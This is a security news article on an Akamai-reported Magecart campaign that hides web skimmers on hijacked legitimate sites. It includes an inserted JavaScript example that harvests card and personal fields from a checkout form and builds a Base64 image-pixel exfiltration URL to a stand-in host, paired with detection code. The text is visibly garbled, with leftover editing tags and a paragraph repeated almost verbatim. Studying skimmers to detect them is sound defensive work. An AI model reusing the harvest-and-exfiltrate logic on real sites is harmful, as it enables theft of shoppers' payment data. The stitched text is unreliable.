
Magecart campaign abuses legitimate sites to host web skimmers and act as C2

A new, ongoing Magecart web skimmer campaign abuses legitimate websites as makeshift command and control (C2) servers.

Akamai researchers discovered a new ongoing Magecart web skimmer campaign aimed at stealing personally identifiable information (PII) and credit card information from users in North America, Latin America, and Europe.

Magecart attacks target e-commerce websites. The name “Magecart” comes from Magento shopping carts, the original targets; the attacks work by injecting malicious JavaScript into the checkout pages of compromised websites.

In the recent campaign uncovered by Akamai, threat actors hijack legitimate websites to act as makeshift C2 servers and use them to distribute malware.

“Attackers employ a number of evasion techniques during the campaign, including obfuscating Base64 and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager.” reads the analysis published by Akamai.

Some of the victim organizations see hundreds of thousands of visitors per month, so a single compromise may have exposed up to tens of thousands of shoppers. The researchers also pointed out that many victims discovered the attack more than a month after the initial compromise.

The attack chain begins with scanning the web for vulnerable legitimate sites, compromising them, and injecting malicious code. The attackers then use these compromised sites as C2 servers to avoid detection.

“Rather than using the attackers’ own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it.” continues the analysis. “In this way, the attackers create a seemingly healthy host for their malicious code, and can deliver it to any victim they choose.”

On the targeted e-commerce sites, the attackers plant only small JavaScript snippets that act as loaders; these fetch the full skimmer from the previously compromised legitimate websites that serve as hosts.
</gre_replace>
<gr_replace lines="23" cat="clarify" orig="Threat actors likely">
The threat actors likely compromised these sites by exploiting known vulnerabilities in popular CMS and e-commerce platforms (such as Magento, WooCommerce, WordPress, and Shopify) or in vulnerable third-party services and components used by the sites.

Threat actors likely compromised the websites by exploiting known vulnerabilities in popular CMS (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services and components used by the website.

The researchers identified two distinct variations of the skimmer code employed in this ongoing campaign. 

The first variant is heavily obfuscated and contains a list of CSS selectors that explicitly target the input fields used to capture PII and credit card details.

The second variant is less obscured, which allowed the Akamai researchers to gauge the scope of the campaign from the indicators present in the code.

Once the data is stolen, the skimmer exfiltrates it through a plain HTTP request triggered by creating an IMG tag. The stolen data is appended to the image URL as query parameters, encoded as a Base64 string. Because an image load is a simple GET with no CORS preflight, the request blends in with ordinary resource fetches.
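To make the mechanism concrete, the following is an added example (not Akamai's code and not the actual skimmer) that reconstructs the harvest-and-exfiltrate pattern described in the two preceding paragraphs and pairs it with a detection routine of the kind a proxy, CSP report collector, or browser extension could run over outbound request URLs. The CSS selectors, field values, hostnames, and the Google hostname allowlist are all constructed for the demo; the card number is the standard 4111... test PAN.

```javascript
// Added example, not code from the Akamai report or the real skimmer.
// Selectors and values below are constructed; the DOM is stubbed so this
// runs under Node without a browser.

// Skimmer side: selectors for the fields it wants (assumed names).
const SELECTORS = [
  'input[name="cc_number"]', 'input[name="cc_exp"]', 'input[name="cc_cvv"]',
  'input[name="email"]', 'input[name="phone"]',
];

// Stand-in for document.querySelector(sel).value on a checkout page.
const fakeDom = {
  'input[name="cc_number"]': '4111111111111111', // test PAN, not a real card
  'input[name="cc_exp"]': '12/27',
  'input[name="cc_cvv"]': '123',
  'input[name="email"]': 'buyer@example.com',
  'input[name="phone"]': '+1-555-0100',
};

// Collect every targeted field that exists on the page.
function harvest(dom, selectors) {
  const out = {};
  for (const sel of selectors) {
    if (dom[sel] !== undefined) out[sel] = dom[sel];
  }
  return out;
}

// Exfil: JSON -> Base64 -> query parameter on an image URL. In a browser the
// skimmer would do `new Image().src = url`; the GET fires with no CORS preflight.
// The host is a compromised legitimate site acting as makeshift C2 (assumed name).
function buildExfilUrl(stolen, host = 'compromised-shop.example') {
  const payload = Buffer.from(JSON.stringify(stolen), 'utf8').toString('base64');
  return `https://${host}/img/pixel.gif?d=${encodeURIComponent(payload)}`;
}

// Detection side. Luhn check: a cheap test for "this digit run is a card number".
function luhnValid(digits) {
  if (digits.length < 13 || digits.length > 19) return false;
  let sum = 0;
  let dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// For each query parameter, Base64-decode it and look for Luhn-valid PANs.
// Returns one finding per parameter that carries card data.
function inspectRequest(url) {
  const u = new URL(url);
  const findings = [];
  for (const [param, value] of u.searchParams) {
    // Buffer.from ignores non-Base64 characters, so benign params decode to noise.
    const decoded = Buffer.from(value, 'base64').toString('utf8');
    const pans = (decoded.match(/\d{13,19}/g) || []).filter(luhnValid);
    if (pans.length) findings.push({ param, pans });
  }
  return findings;
}

// Loader-side check for the masquerade mentioned in the report: a script whose
// path imitates Google Analytics / Tag Manager but is served from another host.
// The allowlist is an assumption for the demo, not an official list.
const GOOGLE_SCRIPT_HOSTS = new Set([
  'www.googletagmanager.com', 'www.google-analytics.com',
]);
function isSpoofedGoogleScript(src) {
  const u = new URL(src);
  const looksGoogle = /gtag\/js|analytics\.js|gtm\.js/.test(u.pathname);
  return looksGoogle && !GOOGLE_SCRIPT_HOSTS.has(u.hostname);
}

// Demo: run the skimmer path, then the detector over the URL it produced.
function demo() {
  const stolen = harvest(fakeDom, SELECTORS);
  const url = buildExfilUrl(stolen);
  return { url, findings: inspectRequest(url) };
}
console.log(demo());
```

The detector keys on content rather than on the destination host, which is the point of the campaign: the exfil host is a legitimate site that reputation lists will not flag. A Content-Security-Policy with a tight `img-src` allowlist on the checkout page would also cut off this particular channel, since the skimmer's image request would be refused by the browser before it leaves the page.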

“The primary solution for effectively combating web skimming lies in the utilization of tools and technologies that provide behavioral and anomaly detection” concludes the report. “Traditional static analysis tools prove inadequate in countering web skimmers, as they continually modify their methods and employ increasingly sophisticated techniques that can evade static analysis.”


Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)
